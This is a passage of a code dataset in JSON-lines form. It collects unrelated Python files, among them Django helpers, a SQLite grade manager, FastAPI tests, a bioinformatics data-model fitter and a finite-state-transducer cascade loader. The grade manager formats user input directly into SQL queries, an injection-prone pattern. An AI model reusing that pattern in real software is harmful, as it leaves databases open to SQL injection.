'__dump__'):\n result.append(obj.__dump__())\n elif id(obj) in seen:\n result.append('')\n else:\n seen.add(id(obj))\n if isinstance(obj, (list, tuple)):\n result.append('[\\n' if isinstance(obj, list) else '(\\n')\n for item in obj:\n result.append('%s,' % obj_dump(item, indent=indent+4, seen=seen))\n result.append(']' if isinstance(obj, list) else ')')\n else:\n result.append(repr(obj) + '\\n')\n for attr, value in obj.__dict__.iteritems():\n result.append('%s: %s,' % (attr, obj_dump(value, indent=indent+4, seen=seen)))\n\n result = result[0] + \"\\n\".join(' ' * indent + i for i in result[1:])\n return result\n\n\ndef get_module_attr(path):\n \"\"\"\n Возвращает атрибут модуля, переданный в виде строки 'module.other.AttrName'.\n Удобно для получения класса по строке импорта.\n При отсутствии атрибута возвращает None.\n \"\"\"\n i = path.rfind('.')\n module, attr = path[:i], path[i+1:]\n try:\n mod = 
import_module(module)\n return getattr(mod, attr, None)\n except ImportError as e:\n return None\n\n\ndef cached_property(func):\n @property\n @wraps(func)\n def wrapper(self):\n attname = '_' + func.__name__\n if not hasattr(self, attname):\n setattr(self, attname, func(self))\n return getattr(self, attname)\n return wrapper\n\n\ndef get_or_none(cls, **cond):\n try:\n return cls.objects.get(**cond)\n except cls.DoesNotExist:\n return None\n","repo_name":"odino4ka49/ConfigUI","sub_path":"venv/lib/python2.7/site-packages/handy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772448841","text":"import __main__ as main\nfrom Helper.TimerLogger import CodeTimeLogging\nfileName = main.__file__\nfileName = fileName.split('\\\\')[-1]\n\nCodeTimeLogging(Flag='F', filename=fileName, Tag='Dynamic-Programing', Difficult='Medium')\n\nCNT = [0]\n\n\ndef treeTopology(n):\n dp = [0 for i in range(n + 1)]\n dp[0] = 1\n dp[1] = 1\n\n for i in range(2, n + 1):\n for j in range(0, i):\n CNT[0] += 1\n catlangNumber = i - j - 1\n dp[i] += dp[j] * dp[catlangNumber]\n print(dp)\n return dp[-1]\n\n\nn = 10\nprint(treeTopology(n))\nprint(f'cnt = {CNT}')\nCNTC = [0]\n\n\ndef treeTopologyCache(n, cache):\n\n if n in cache:\n return cache[n]\n total = 0\n for i in range(n):\n CNTC[0] += 1\n j = n - i - 1\n itotal = treeTopologyCache(i, cache)\n jtotal = treeTopologyCache(j, cache)\n\n total += itotal * jtotal\n\n cache[n] = total\n return total\n\n\nprint(treeTopologyCache(n, {0: 1}))\nprint(f'cntc = {CNTC}')\n","repo_name":"Omkar02/FAANG","sub_path":"DP_31_NumberOfBinaryTreeTopology.py","file_name":"DP_31_NumberOfBinaryTreeTopology.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30587977943","text":"import socket\ndef mysend(s, msg):\n\ttotalsent = 0\n\twhile totalsent < len(msg):\n\t\tsent = s.send(bytes(msg[totalsent:],'UTF-8'))\n\t\tif sent == 0:\n\t\t\traise RuntimeError(\"socket connection broken\")\n\t\ttotalsent = totalsent + sent\n\ts.send(bytes(chr(0),'UTF-8'))\ndef a(MESSAGE):\n\tglobal data\n\tTCP_IP = '127.0.0.1'\n\tTCP_PORT = 5014\n\tBUFFER_SIZE = 1024*1024\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((TCP_IP, TCP_PORT))\n\tmysend(s,MESSAGE)\n\tdata = s.recv(BUFFER_SIZE)\n\ts.close()\ndef gogogadjet(mes):\n\ta('o'+mes)\n\treturn str(data,'UTF-8')\ndef gogocre(nom,cible,description,date):\n\ta('e'+nom+'|'+cible+'|'+description+'|'+str(date))\ndef gogoReListe():\n\ta('l')\nif __name__=='__main__':\n\tdata=\"\"\n\ta(\"\"\"oaccueil.css\"\"\")\n\tprint(\"received data:\", data)","repo_name":"Gabriel-Desharnais/Presentateur-code-python","sub_path":"cgi/gogogadjet.py","file_name":"gogogadjet.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24174221701","text":"import sqlite3\n\nconn = sqlite3.connect(\"My_Grades.db\")\nc = conn.cursor()\n\n\ndef add_subject():\n while True:\n subject_name = input(\"[Enter the name of the new Subject]: \")\n try:\n c.execute(\"CREATE TABLE {} (grade text)\".format(subject_name))\n conn.commit()\n break\n except:\n print(\"[This subject already exists or you enter invalid name]\")\n\n\ndef add_grade():\n while True:\n subject_name = input(\"[Enter the name of the Subject]: \")\n c.execute(\"SELECT 
count(name) FROM sqlite_master WHERE type='table' AND name='{}'\".format(subject_name))\n        if c.fetchone()[0] == 1:\n            grade = input(\"[Enter the grade]: \")\n            try:\n                float(grade)\n                c.execute(\"INSERT INTO {} VALUES (?)\".format(subject_name), (grade,))\n                conn.commit()\n                break\n            except:\n                print(\"[Invalid grade]\")\n            break\n        print(\"[Invalid Subject]\")\n\n\ndef view_grades():\n    c.execute(\"SELECT name FROM sqlite_master WHERE type='table'\")\n    subjects = list(map(lambda x: \"\".join(x), c.fetchall()))\n    for i in subjects:\n        c.execute(\"SELECT * FROM {}\".format(i))\n        grades = list(map(lambda x: \"\".join(x), c.fetchall()))\n        if len(grades) > 0:\n            average = sum(list(map(lambda x: float(x), grades)))/len(grades)\n        else:\n            average = 0\n        print(f\"[{i}]\" + \" \"*(15-len(i)) + \"({:.2f}) \".format(average) + \" \".join(grades))\n\n\ndef delete_subject():\n    while True:\n        subject_name = input(\"[Enter the name of the Subject you want to delete]: \")\n        if subject_name == \"q\":\n            break\n        c.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='{}'\".format(subject_name))\n        if c.fetchone()[0] == 1:\n            while True:\n                warning = input(\"[Are you sure you want to delete {}? (y/n)]: \".format(subject_name))\n                if warning == \"y\":\n                    c.execute(\"DROP TABLE {}\".format(subject_name))\n                    conn.commit()\n                    print(f\"[{subject_name} deleted]\")\n                    break\n                elif warning == \"n\":\n                    break\n                else:\n                    print(\"[Invalid input]\")\n            break\n        else:\n            print(\"[This Subject does not exist]\")\n\n\ndef delete_grade():\n    while True:\n        subject_name = input(\"[Enter the name of the Subject]: \")\n        if subject_name == \"q\":\n            break\n        c.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='{}'\".format(subject_name))\n        if c.fetchone()[0] == 1:\n            c.execute(\"SELECT rowid, * FROM {}\".format(subject_name))\n            grades = c.fetchall()\n            while True:\n                for i in grades:\n                    print(f\"[{i[0]}] {i[1]}\")\n                grade_id = input(\"[Enter the [id] of the grade you want to delete]: \")\n                try:\n                    c.execute(f\"SELECT * FROM {subject_name} WHERE rowid={grade_id}\")\n                    grade = \"\".join(c.fetchone())\n                    while True:\n                        warning = input(f\"[Are you sure you want to delete {grade} from {subject_name}? 
(y/n)]: \")\n if warning == \"y\":\n c.execute(f\"DELETE from {subject_name} WHERE rowid={grade_id}\")\n conn.commit()\n print(f\"[{grade} deleted from {subject_name}]\")\n break\n elif warning == \"n\":\n break\n else:\n print(\"[Invalid input]\")\n break\n except:\n print(\"[Invalid input]\")\n break\n else:\n print(f\"[{subject_name} does not exist]\")\n \n","repo_name":"FilipNeubauer/grade_manager","sub_path":"grades_manager.py","file_name":"grades_manager.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7701248192","text":"import matplotlib.pyplot as plt\nimport numpy as np\nplt.rcParams['font.sans-serif'] = ['KaiTi', 'SimHei', 'FangSong'] # 汉字字体,优先使用楷体,如果找不到楷体,则使用黑体\nplt.rcParams['font.size'] = 12 # 字体大小\nplt.rcParams['axes.unicode_minus'] = False # 正常显示负号\n\nx = np.arange(-2, 2, 0.01)\n\ny = 2*np.sin(np.pi*x)*np.sin(np.pi*x/2) / (np.pi * np.pi * x *x)\n\nplt.title(\"一元二次函数\")\nplt.plot(x, y)\nplt.show()\n","repo_name":"zjuws/pyproject","sub_path":"math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21910853013","text":"from collections import OrderedDict\n\nfrom unidecode import unidecode\n\nfrom molgenis.bbmri_eric.errors import EricWarning\nfrom molgenis.bbmri_eric.model import NodeData, Table, TableType\nfrom molgenis.bbmri_eric.printer import Printer\nfrom molgenis.bbmri_eric.utils import to_ordered_dict\n\n\nclass ModelFitter:\n \"\"\"\n Sometimes, model changes are implemented in the published tables, but can't be\n implemented yet in all staging areas because action (adjustment of local databases,\n API calls, etc) from the national nodes is needed.\n This class contains temporary solutions to transform the staging areas data\n according to the published model. If the models of all staging areas are equal to\n the published model this class shouldn't contain any methods.\n \"\"\"\n\n def __init__(\n self,\n node_data: NodeData,\n printer: Printer,\n ):\n self.node_data = node_data\n self.printer = printer\n\n self.warnings = []\n\n def fit_model(self):\n \"\"\"\n Transforms the data of a node according to the published model:\n 1. Merges biobank 'covid19biobank' values into 'capabilities'\n 2. Moves biobank and collection head information to persons\n \"\"\"\n self._merge_covid19_capabilities()\n self._move_heads_to_persons()\n return self.warnings\n\n def _add_warning(self, message: str):\n self.printer.print_warning(EricWarning(message), indent=1)\n self.warnings.append(message)\n\n def _merge_covid19_capabilities(self):\n \"\"\"\n Merges each biobank's 'covid19biobank' column into its 'capabilities' column and\n then removes it.\n \"\"\"\n self.printer.print(\"Merging 'covid19biobank' into 'capabilities'\")\n\n covid = \"covid19biobank\"\n caps = \"capabilities\"\n for biobank in self.node_data.biobanks.rows:\n if covid in biobank and biobank[covid]:\n self._add_warning(\n f\"Biobank {biobank['id']} uses deprecated {covid}' \"\n f\"column. 
Use '{caps}' instead.\"\n )\n\n if not biobank[caps]:\n biobank[caps] = []\n\n biobank[caps] = list(\n OrderedDict.fromkeys(biobank[caps] + biobank[covid])\n )\n\n biobank.pop(covid, None)\n\n def _move_heads_to_persons(self):\n \"\"\"\n Moves the head information in the biobank and collection tables to persons and\n adds the person ID to the biobank and collection tables.\n \"\"\"\n self.printer.print(\"Moving heads to persons\")\n self._move_heads_for_table(self.node_data.biobanks)\n self._move_heads_for_table(self.node_data.collections)\n\n def _move_heads_for_table(self, table: Table):\n \"\"\"\n 1. Checks if the head already exists as a person\n 2a. If not, creates a new person\n 2b. If so, updates person information (f.e. add the role)\n 3. Fills the 'head' column with person ID\n 4. Removes the redundant 'head' columns.\n \"\"\"\n head_columns = [\n \"head_title_before_name\",\n \"head_firstname\",\n \"head_lastname\",\n \"head_title_after_name\",\n \"head_role\",\n ]\n\n for row in table.rows:\n if set(row.keys()).isdisjoint(set(head_columns)):\n continue\n\n if \"head\" in row.keys():\n self._add_warning(\n f\"{table.type.value.capitalize()[:-1]} has a head ID. \"\n \"But still includes deprecated 'head' columns.\"\n )\n\n else:\n self._add_warning(\n f\"{table.type.value.capitalize()[:-1]} {row['id']} uses \"\n \"deprecated 'head' columns. Move head info to persons instead.\"\n )\n\n # Add head id to the table\n row[\"head\"] = self._add_head(row, table)\n\n for column in head_columns:\n row.pop(column, None)\n\n def _add_head(self, data, table):\n if {\"head_lastname\", \"head_firstname\"}.issubset(set(data.keys())):\n person_id = self._check_person(data)\n if not person_id:\n self._add_warning(\n f\"Add {data['head_firstname']} {data['head_lastname']} to persons \"\n )\n person_id = self._create_person(data)\n return person_id\n\n self._add_warning(\n f\"{table.type.value.capitalize()[:-1]} {data['id']} has head\"\n \" info without first and/or last name\"\n )\n\n return None\n\n def _check_person(self, data):\n # A head exists if the combination of first- and last name exists in persons\n for person in self.node_data.persons.rows:\n if (\n person.get(\"last_name\", \"NN\").lower().replace(\" \", \"\")\n == data[\"head_lastname\"].lower().replace(\" \", \"\")\n and person.get(\"first_name\", \"NN\").lower().strip()\n == data[\"head_firstname\"].lower().strip()\n ):\n if \"role\" in person and person[\"role\"] and data.get(\"head_role\"):\n roles = person[\"role\"].split(\" and \")\n roles.append(data.get(\"head_role\").strip())\n person[\"role\"] = \" and \".join(set(roles))\n else:\n person[\"role\"] = data.get(\"head_role\")\n return person[\"id\"]\n\n return None\n\n def _create_person(self, data):\n prefix = self.node_data.node.get_id_prefix(TableType.PERSONS)\n person = dict()\n person[\"id\"] = prefix + data.get(\"head_lastname\").lower().replace(\" \", \"\")\n person[\"id\"] = unidecode(person[\"id\"])\n person[\"title_before_name\"] = data.get(\"head_title_before_name\")\n person[\"first_name\"] = data.get(\"head_firstname\")\n person[\"last_name\"] = data.get(\"head_lastname\")\n person[\"title_after_name\"] = data.get(\"head_title_after_name\")\n person[\"role\"] = data.get(\"head_role\")\n person[\"email\"] = \"UNKNOWN@\" + self.node_data.node.code\n person[\"country\"] = data.get(\"country\")\n person[\"national_node\"] = self.node_data.node.code\n self.node_data.persons.rows_by_id.update(to_ordered_dict([person]))\n\n return 
person[\"id\"]\n","repo_name":"molgenis/molgenis-py-bbmri-eric","sub_path":"src/molgenis/bbmri_eric/model_fitting.py","file_name":"model_fitting.py","file_ext":"py","file_size_in_byte":6347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"905807783","text":"\"\"\"\nThis file is part of the L3Morpho package.\n\n L3Morpho is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n L3Morpho is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with L3Morpho. If not, see .\n-------------------------------------------------------\n\nCascades of weighted finite state transducers.\n\n-- 2011-05-20\n Split off from fst.py.\n\"\"\"\n\nimport re, os, time, functools\nfrom .semiring import *\nfrom .fst import FST\n\n######################################################################\n# CONTENTS\n######################################################################\n# 1. Finite State Transducer Cascade\n# 2. Alternation Rules\n# 3. Morphotactics\n######################################################################\n\n######################################################################\n# Constants\n######################################################################\n\nFST_DIRECTORY = os.path.join(os.path.dirname(__file__),\n os.path.pardir,\n 'FST')\n\n## Regexs for parsing cascades\n# string_set_label={chars1, chars1, chars2, ...}\nSS_RE = re.compile('(\\S+)\\s*=\\s*\\{(.*)\\}', re.U)\n# weighting = UNIFICATION\nWEIGHTING_RE = re.compile('weighting\\s*=\\s*(.*)')\n# >fst<\nCASC_FST_RE = re.compile(r'>(.*?)<')\n# cascade name = {0, 1, 3, ...}\nSUBCASC_RE = re.compile('cascade\\s*(\\S+)\\s*=\\s*\\{(.*)\\}')\n# +lex+\nCASC_LEX_RE = re.compile(r'\\+(.*?)\\+')\n\n\n######################################################################\n# Finite State Transducer Cascade\n######################################################################\n\nclass FSTCascade(list):\n \"\"\"\n A list of FSTs to be composed.\n \"\"\"\n\n def __init__(self, label, *fsts):\n list.__init__(self, fsts)\n\n self.label = label\n\n # String sets, abbreviated in cascade file\n self._stringsets = {}\n\n # Semiring weighting for all FSTs; defaults to FSS with unification\n self._weighting = UNIFICATION_SR\n\n # Composition of FSTs\n self._composition = None\n\n # All FSTs, including those not in the composition\n self._fsts = {}\n\n # Language this cascade belongs to\n self.language = None\n\n # Initial weight to use during transduction\n self.init_weight = None\n\n # Dictionary of lists of FST indices, for particular purposes\n self._cascades = {}\n\n def __str__(self):\n \"\"\"Print name for cascade.\"\"\"\n return 'FST cascade ' + self.label\n\n def add(self, fst):\n \"\"\"Add an FST to the dictionary with its label as key.\"\"\"\n self._fsts[fst.label] = fst\n\n def inverted(self):\n \"\"\"Return a list of inverted FSTs in the cascade.\"\"\"\n fsts = [(fst.inverted() if isinstance(fst, FST) else fst) for fst in self]\n inv = FSTCascade(self.label + '_inv', *fsts)\n inv.init_weight = self.init_weight\n inv._weighting = self._weighting\n 
inv._stringsets = self._stringsets\n return inv\n\n def compose(self, begin=0, end=None, first=None, last=None, subcasc=None, backwards=False,\n relabel=True, trace=0):\n \"\"\"Compose the FSTs that make up the cascade list or a sublist, including possible first and last FSTs.\"\"\"\n if len(self) == 1:\n return self[0]\n else:\n fsts = []\n if subcasc:\n if subcasc not in self._cascades:\n raise ValueError(\"%r is not a valid subscascade label\" % subcasc)\n fsts = [self[i] for i in self._cascades[subcasc]]\n else:\n fsts = self[begin:(end if end != None else len(self))] # end could be 0\n if first:\n fsts = [first] + fsts\n if last:\n fsts.append(last)\n return FST.compose(fsts, self.label + '@', relabel=relabel, trace=trace)\n\n def mult_compose(self, ends):\n begin = 0\n fsts = []\n for end in ends:\n fsts.append(self.compose(begin, end))\n begin = end\n fsts.append(self.compose(begin, len(self)))\n return fsts\n\n def rev_compose(self, split_index, begin=0, trace=0):\n \"\"\"Compose the FSTs in the cascade in two steps.\"\"\"\n # Compose from split_index to end\n c1 = self.compose(begin=split_index, trace=trace)\n # Compose from beginning to split_index\n return self.compose(begin=begin, end=split_index, last=c1, trace=trace)\n\n def compose_backwards(self, indices=[], subcasc=None, trace=0):\n if not indices:\n if subcasc:\n # Use a copy of the cascade indices because we're going to reverse them\n indices = list(self._cascades[subcasc])\n else:\n indices = range(len(self))\n indices.reverse()\n c = FST.compose([self[indices[1]], self[indices[0]]], trace=trace)\n for n in indices[2:]:\n c = FST.compose([self[n], c], trace=trace)\n return c\n\n def composition(self, begin=0, end=None):\n \"\"\"The composed FSTs.\"\"\"\n if not self._composition:\n self._composition = self.compose(begin=begin, end=end or len(self))\n return self._composition\n\n def transduce(self, inp_string, inp_weight, fsts, seg_units=[]):\n result = [[inp_string, inp_weight]]\n for fst in fsts:\n print(fst.label)\n result = reduce_lists([fst.transduce(x[0], x[1], seg_units=seg_units) for x in result])\n if not result:\n return False\n return result\n\n def stringset(self, label):\n \"\"\"A labeled set of strings.\"\"\"\n return self._stringsets.get(label, None)\n\n def stringset_label(self, stringset):\n \"\"\"The label for a stringset if it's in the dict.\"\"\"\n for label, sset in self._stringsets.items():\n if stringset == sset:\n return label\n\n def stringset_intersection(self, ss_label1=None, ss_label2=None, ss1=None, ss2=None):\n \"\"\"Label for the intersection of two stringsets or element if only one.\n\n Either the labels or the stringsets or both are provided.\"\"\"\n ss1 = ss1 or self.stringset(ss_label1)\n ss2 = ss2 or self.stringset(ss_label2)\n ss_label1 = ss_label1 or self.stringset_label(ss1)\n ss_label2 = ss_label2 or self.stringset_label(ss2)\n if ss1 and ss2:\n intersect = ss1 & ss2\n if intersect: # could be empty\n if len(intersect) == 1:\n # If there's only one element, don't create a new stringset\n return list(intersect)[0]\n # Otherwise create a new stringset\n i_label = self.stringset_label(intersect)\n if i_label:\n # The stringset intersection is already in the dict\n return i_label\n # The stringset intersection is not in the dict\n # Add it and return its label\n new_label = FSTCascade.simplify_intersection_label(ss_label1, ss_label2)\n return new_label\n\n @staticmethod\n def simplify_intersection_label(label1, label2):\n \"\"\"Simplify an intersection label by eliminating common 
elements.\"\"\"\n if not '&' in label1 and not '&' in label2:\n # the two expressions between with the same stringset\n return FSTCascade.simplify_difference_intersection_labels(label1, label2)\n else:\n return '&'.join(set(label1.split('&')) | set(label2.split('&')))\n\n @staticmethod\n def simplify_difference_intersection_labels(label1, label2):\n \"\"\"Simplify an intersection of differences if first elements are the same.\"\"\"\n labels1 = label1.split('-')\n labels2 = label2.split('-')\n if labels1[0] == labels2[0]:\n set1 = set(labels1[1].split(',')) if len(labels1) > 1 else set()\n set2 = set(labels2[1].split(',')) if len(labels2) > 1 else set()\n subtracted = set1 | set2\n return labels1[0] + '-' + ','.join(subtracted)\n else:\n return label1 + '&' + label2\n\n def generate_stringset(self, label):\n \"\"\"Make a stringset from a label.\n\n L: stored stringset\n L1-L2: difference of two stored stringsets\n L1-abc: difference of stringset L1 and the set of characters {abc}\n L1&L2: intersection of two stringsets (stored or generated)\n \"\"\"\n ss = self.stringset(label)\n if ss:\n return ss\n if '-' in label or '&' in label:\n return self.intersect_stringsets(label.split('&'))\n\n def subtract_stringsets(self, label1, label2):\n \"\"\"Difference between stringsets with labels or sets of characters.\"\"\"\n ss1 = self.stringset(label1)\n if not ss1:\n ss1 = set([label1])\n ss2 = self.stringset(label2)\n if not ss2:\n ss2 = set([label2]) # set consisting of single phoneme/grapheme\n return ss1 - ss2\n\n def intersect_stringsets(self, labels):\n \"\"\"Intersection of stringsets with given labels.\"\"\"\n return functools.reduce(lambda x, y: x.intersection(y), [self.diff_stringset(label) for label in labels])\n\n def diff_stringset(self, label):\n \"\"\"label is either a stored stringset or a stringset difference expression.\"\"\"\n ss = self.stringset(label)\n if ss:\n return ss\n labels = label.split(\"-\")\n # Assume there's only one -\n return self.subtract_strings(labels[0], labels[1])\n\n def subtract_strings(self, label1, label2):\n \"\"\"Difference between stringsets with labels or sets of characters.\"\"\"\n ss1 = self.stringset(label1)\n if not ss1:\n ss1 = set(label1.split(','))\n ss2 = self.stringset(label2)\n if not ss2:\n ss2 = set(label2.split(','))\n return ss1 - ss2\n\n def add_stringset(self, label, seq):\n \"\"\"Add a labeled set of strings, updating sigma accordingly.\"\"\"\n self._stringsets[label] = frozenset(seq)\n\n def weighting(self):\n \"\"\"The weighting semiring for the cascade.\"\"\"\n return self._weighting\n\n def set_weighting(self, label):\n \"\"\"Set the weighting for the cascade.\"\"\"\n label = label.lower()\n if 'uni' in label:\n self._weighting = UNIFICATION_SR\n elif 'prob' in label:\n self._weighting = PROBABILITY_SR\n elif 'trop' in label:\n self._weighting = TROPICAL_SR\n\n def get(self, label):\n \"\"\"The FST with the given label.\"\"\"\n return self._fsts.get(label)\n\n def set_init_weight(self, fs):\n self.init_weight = FSSet(fs)\n\n @staticmethod\n def load(filename, seg_units=[], create_networks=True, subcasc=None, language=None,\n weight_constraint=None, verbose=True):\n \"\"\"\n Load an FST cascade from a file.\n\n If not create_networks, only create the weighting and string sets.\n \"\"\"\n if verbose:\n print('Loading FST cascade from', filename)\n directory, fil = os.path.split(filename)\n label = del_suffix(fil, '.')\n\n return FSTCascade.parse(label, open(filename, encoding='utf-8').read(), directory=directory,\n subcasc=subcasc, 
create_networks=create_networks, seg_units=seg_units,\n language=language, weight_constraint=weight_constraint, verbose=verbose)\n \n @staticmethod\n def parse(label, s, directory='', create_networks=True, seg_units=[], subcasc=None, language=None,\n weight_constraint=None, verbose=False):\n \"\"\"\n Parse an FST cascade from the contents of a file as a string.\n\n If not create_networks, only create the weighting and string sets.\n \"\"\"\n\n cascade = FSTCascade(label)\n cascade.language = language\n cascade.seg_units = seg_units\n \n lines = s.split('\\n')[::-1]\n subcasc_indices = []\n\n while lines:\n line = lines.pop().split('#')[0].strip() # strip comments\n\n if not line: continue\n\n # Weighting for all FSTs\n m = WEIGHTING_RE.match(line)\n if m:\n cascade.set_weighting(m.group(1))\n continue\n\n # Subcascade, specifying indices\n # label = {i, j, ...}\n m = SUBCASC_RE.match(line)\n if m:\n label, indices = m.groups()\n indices = [int(i.strip()) for i in indices.split(',')]\n cascade._cascades[label] = indices\n # If we're only loading a certain subcascade and this is it, save its indices\n if label == subcasc:\n subcasc_indices = indices\n continue\n\n # String set (a list, converted to a frozenset)\n m = SS_RE.match(line)\n\n if m:\n label, strings = m.groups()\n # Characters may contain unicode\n# strings = strings.decode('utf8')\n cascade.add_stringset(label, [s.strip() for s in strings.split(',')])\n continue\n\n # FST\n m = CASC_FST_RE.match(line)\n if m:\n if create_networks:\n label = m.group(1)\n filename = label + '.fst'\n if not subcasc_indices or len(cascade) in subcasc_indices:\n fst = FST.load(os.path.join(directory, filename),\n cascade=cascade, weighting=cascade.weighting(),\n seg_units=seg_units, weight_constraint=weight_constraint,\n verbose=verbose)\n else:\n fst = 'FST' + str(len(cascade))\n if verbose:\n print('Skipping FST', label)\n cascade.append(fst)\n continue\n\n # FST in a lex file\n m = CASC_LEX_RE.match(line)\n if m:\n if create_networks:\n label = m.group(1)\n # handle specs\n filename = label + '.lex'\n if not subcasc_indices or len(cascade) in subcasc_indices:\n fst = FST.load(os.path.join(directory, filename),\n cascade=cascade, weighting=cascade.weighting(),\n seg_units=seg_units, weight_constraint=weight_constraint,\n verbose=verbose, lex_features=True)\n if verbose:\n print('Adding lex FST', label, 'to cascade')\n else:\n fst = 'FST' + str(len(cascade))\n if verbose:\n print('Skipping lex FST', label)\n cascade.append(fst)\n continue\n raise ValueError(\"bad line: %r\" % line)\n\n return cascade\n\n","repo_name":"adamsamson/HornMorpho2.5","sub_path":"HornMorpho-2.5/l3/morpho/casc.py","file_name":"casc.py","file_ext":"py","file_size_in_byte":15601,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"54"} +{"seq_id":"21420000581","text":"from uuid import UUID\n\nfrom fastapi.testclient import TestClient\n\nfrom app.main import app\nfrom app.tests.medium.constants import MISPTAG1, MISPTAG2, USER1\nfrom app.tests.medium.utils import create_misp_tag, create_user, headers\n\nclient = TestClient(app)\n\n\ndef test_create_misptag():\n create_user(USER1)\n misptag1 = create_misp_tag(USER1, MISPTAG1)\n assert misptag1.tag_name == MISPTAG1\n assert isinstance(misptag1.tag_id, UUID)\n\n\ndef test_get_misptags():\n create_user(USER1)\n create_misp_tag(USER1, MISPTAG1)\n create_misp_tag(USER1, MISPTAG2)\n response = client.get(\"/misp_tags\", headers=headers(USER1))\n assert response.status_code == 200\n 
responsed_misptags = response.json()\n assert len(responsed_misptags) == 2\n tag_names = [m[\"tag_name\"] for m in responsed_misptags]\n assert MISPTAG1 in tag_names\n assert MISPTAG2 in tag_names\n\n\ndef test_search_misptag():\n create_user(USER1)\n create_misp_tag(USER1, MISPTAG1)\n create_misp_tag(USER1, MISPTAG2)\n params = {\"words\": [\"amber\"]}\n response = client.get(\"/misp_tags/search\", headers=headers(USER1), params=params)\n assert response.status_code == 200\n assert len(response.json()) == 1\n","repo_name":"nttcom/threatconnectome","sub_path":"api/app/tests/medium/routers/test_misptags.py","file_name":"test_misptags.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"16213699388","text":"#Tuplas \n\ninventario = (\n\t\"espada\", \"armadura\", \"escudo\", \"pocion de vida\")\n\nif not inventario:\n\tprint(\"Tenes las manos vacias...\")\nelse:\n\tprint(\"Tus items: \")\n\n\tfor elemento in inventario:\n\t\tprint(\"*\",elemento.title())\n\ninput(\"Enter para continuar...\")","repo_name":"luzrubini/Pyhton","sub_path":"LuzRubini/clase_04/inventario_del_heroe.py","file_name":"inventario_del_heroe.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22712241671","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import get_object_or_404\nfrom .models import NotifyMe, Report, Post, Comments\n\n\n@receiver(post_save, sender=Report)\ndef create_report(sender, created, instance, **kwargs):\n title = \"New Report\"\n message = f\"{instance.user.username} add a new report\"\n\n admin_user = get_object_or_404(User, username=\"joselyn\")\n\n if created:\n NotifyMe.objects.create(user=admin_user, notify_title=title,\n notify_alert=message, sender=instance.user, greport=instance.id)\n\n\n@receiver(post_save, sender=Post)\ndef alert_post_create(sender, created, instance, **kwargs):\n title = \"New Post\"\n message = f\"{instance.author.username} added a new post\"\n\n users = User.objects.exclude(id=instance.author.id)\n\n if created:\n for i in users:\n NotifyMe.objects.create(user=i, notify_title=title, notify_alert=message,\n sender=instance.author, gpost=instance.id)\n\n\n@receiver(post_save, sender=Comments)\ndef alert_post_comment(sender, created, instance, **kwargs):\n title = \"New post comment\"\n post_user = instance.post.author\n message = f\"{instance.user.username} comment on your post '{instance.post.title}\"\n\n if created:\n if not instance.user == instance.post.author:\n NotifyMe.objects.create(user=post_user, notify_title=title, notify_alert=message,\n sender=instance.user, gpost=instance.post.id)\n","repo_name":"gabrielstonedelza/Orgeonofstars","sub_path":"blog/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2514441235","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\nimport os\nimport nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nimport pandas as pd\nfrom functools import reduce\nfrom tqdm import tqdm\n\n\ndef write_file(filename, headers, items):\n print(\"\\nWriting to file:\", filename)\n f = open(filename, \"w\", encoding='utf8')\n concat = lambda x,y: str(x) + ',' + str(y)\n f.write(reduce(concat, headers) + '\\n')\n for i in tqdm(range(len(items))):\n f.write(reduce(concat, items[i]) + '\\n')\n f.close()\n\n\ndef get_kwords(df, k=3):\n print('\\nProcessing k-words... k=' + str(k))\n progress = tqdm(total=df.shape[0])\n count = {} # (w0,w1,w2) -> (count_sincere, count_insencere)\n for index, row in df.iterrows():\n line = row[1].lower()\n target = row[2]\n for c in '.,:;?!/\"\\'()*&^%$#@':\n line = line.replace(c, ' ')\n \n line_words = word_tokenize(line)\n for i in range(len(line_words)-k+1):\n key = tuple(line_words[i+j] for j in range(k))\n if key not in count:\n count[key] = (0, 0)\n if target == 0:\n count[key] = (count[key][0] + 1, count[key][1])\n else:\n count[key] = (count[key][0], count[key][1] + 1)\n\n 